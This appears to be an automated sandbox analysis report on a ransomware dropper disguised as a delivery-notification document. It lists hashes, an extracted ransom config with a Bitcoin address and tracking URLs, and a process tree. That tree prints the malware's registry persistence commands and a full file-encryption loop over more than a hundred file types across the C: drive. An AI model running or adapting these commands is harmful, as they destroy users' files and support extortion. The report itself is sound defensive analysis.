Analysis
-
max time kernel
119s -
max time network
133s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
15-01-2021 15:50
Static task
static1
Behavioral task
behavioral1
Sample
Delivery_Notification_00896328.doc.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Delivery_Notification_00896328.doc.js
Resource
win10v20201028
General
-
Target
Delivery_Notification_00896328.doc.js
-
Size
248KB
-
MD5
0168089428c6aa371f4275d0872b0970
-
SHA1
d2595c0a40c4d8dcf9f7c711f472abc6ac0f592e
-
SHA256
dc20c80a0c1db5848ceef6714c6d774f3002a0c595638aff0410ae2ddabb710a
-
SHA512
915d7a3f63429a27dace53418d8b3216ef3b4b6ac82d63ecca6f1590aa7380449fb4fe3ec8eed5a9aa3a8dadeed5ef32091ecdf2e885aca8d998d8150d07f418
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\a.txt
19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://ferroli-lietuva.eu/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://georgina-collier.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://firstshow.info/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://gayathri.co.in/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
http://jackroubaud.com/counter/?a=19bKG2PuU8s4kjfqBYepN3yTuuKC2NEQbZ
Signatures
-
Blocklisted process makes network request 8 IoCs
Processes:
wscript.exeflow pid process 10 508 wscript.exe 11 508 wscript.exe 13 508 wscript.exe 15 508 wscript.exe 18 508 wscript.exe 20 508 wscript.exe 21 508 wscript.exe 25 508 wscript.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
cmd.exedescription ioc process File renamed C:\Users\Admin\Pictures\UninstallSet.tiff => C:\Users\Admin\Pictures\UninstallSet.tiff.crypted cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crypted = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt" reg.exe -
Modifies registry class 7 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.crypted\ = "Crypted" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Crypted\shell\open\command\ = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\a.txt\"" reg.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
wscript.execmd.execmd.execmd.exedescription pid process target process PID 508 wrote to memory of 3064 508 wscript.exe cmd.exe PID 508 wrote to memory of 3064 508 wscript.exe cmd.exe PID 508 wrote to memory of 3656 508 wscript.exe cmd.exe PID 508 wrote to memory of 3656 508 wscript.exe cmd.exe PID 508 wrote to memory of 2868 508 wscript.exe cmd.exe PID 508 wrote to memory of 2868 508 wscript.exe cmd.exe PID 508 wrote to memory of 2060 508 wscript.exe cmd.exe PID 508 wrote to memory of 2060 508 wscript.exe cmd.exe PID 508 wrote to memory of 4008 508 wscript.exe cmd.exe PID 508 wrote to memory of 4008 508 wscript.exe cmd.exe PID 508 wrote to memory of 2176 508 wscript.exe cmd.exe PID 508 wrote to memory of 2176 508 wscript.exe cmd.exe PID 3064 wrote to memory of 1232 3064 cmd.exe reg.exe PID 3064 wrote to memory of 1232 3064 cmd.exe reg.exe PID 2868 wrote to memory of 692 2868 cmd.exe reg.exe PID 2868 wrote to memory of 692 2868 cmd.exe reg.exe PID 3656 wrote to memory of 1568 3656 cmd.exe reg.exe PID 3656 wrote to memory of 1568 3656 cmd.exe reg.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Delivery_Notification_00896328.doc.js1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Crypted" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\a.txt"3⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCR\.crypted" /ve /t REG_SZ /F /D "Crypted"3⤵
- Modifies registry class
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c REG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCR\Crypted\shell\open\command" /ve /t REG_SZ /F /D "notepad.exe \"C:\Users\Admin\AppData\Local\Temp\a.txt\""3⤵
- Modifies registry class
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\AppData\Roaming\Desktop\DECRYPT.txt"2⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\a.txt" "C:\Users\Admin\Desktop\DECRYPT.txt"2⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c for /r "C:\" %i in (*.zip *.rar *.r00 *.r01 *.r02 *.r03 *.7z *.tar *.gz *.gzip *.arc *.arj *.bz *.bz2 *.bza *.bzip *.bzip2 *.ice *.xls *.xlsx *.doc *.docx *.pdf *.djvu *.fb2 *.rtf *.ppt *.pptx *.pps *.sxi *.odm *.odt *.mpp *.ssh *.pub *.gpg *.pgp *.kdb *.kdbx *.als *.aup *.cpr *.npr *.cpp *.bas *.asm *.cs *.php *.pas *.class *.py *.pl *.h *.vb *.vcproj *.vbproj *.java *.bak *.backup *.mdb *.accdb *.mdf *.odb *.wdb *.csv *.tsv *.sql *.psd *.eps *.cdr *.cpt *.indd *.dwg *.ai *.svg *.max *.skp *.scad *.cad *.3ds *.blend *.lwo *.lws *.mb *.slddrw *.sldasm *.sldprt *.u3d *.jpg *.jpeg *.tiff *.tif *.raw *.avi *.mpg *.mp4 *.m4v *.mpeg *.mpe *.wmf *.wmv *.veg *.mov *.3gp *.flv *.mkv *.vob *.rm *.mp3 *.wav *.asf *.wma *.m3u *.midi *.ogg *.mid *.vdi *.vmdk *.vhd *.dsk *.img *.iso) do (REN "%i" "%~nxi.crypted" & call C:\Users\Admin\AppData\Local\Temp\a0.exe "%i.crypted" 2el84e983wl76brdq89zescdizbgcy3hvihx)2⤵
- Modifies extensions of user files
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\a.txtMD5
512ad548377714262b373c665f17d1db
SHA10f05efd559b90eb77418c32fa86cfcba77b6e187
SHA25627966b12ff9831318138b9cf663fd8e25e9469c347fe630a2c6a491bf125e2ca
SHA512f0e7456eccd513a3b09ffe1411ba661716d37efeff6cdd06b00e7859c935655a0eb5e0d75deef9f56985ff360f41e61b8f2eefa819d0677c8aa72cfb2a788943
-
C:\Users\Admin\AppData\Local\Temp\a0.exeMD5
7c7ff5fdc3cc7705f4d42ec4e3eab8a5
SHA198416dfe3086b4dfb2cbc8170b01e292ef30d982
SHA256dc20be27348645f896c30914b3cbc66cdc7160702d3f307d3b1669095f483b27
SHA51277fee3199567ff012dd5f617b620bbcbd5eefb940a795063e42cdaa8b2d224e810d16ce7b88544c5a429f75f9c7a9434613be4276097a8a05d9ec7fa4daab9e9
-
memory/692-10-0x0000000000000000-mapping.dmp
-
memory/1232-9-0x0000000000000000-mapping.dmp
-
memory/1568-11-0x0000000000000000-mapping.dmp
-
memory/2060-5-0x0000000000000000-mapping.dmp
-
memory/2176-7-0x0000000000000000-mapping.dmp
-
memory/2868-4-0x0000000000000000-mapping.dmp
-
memory/3064-2-0x0000000000000000-mapping.dmp
-
memory/3656-3-0x0000000000000000-mapping.dmp
-
memory/4008-6-0x0000000000000000-mapping.dmp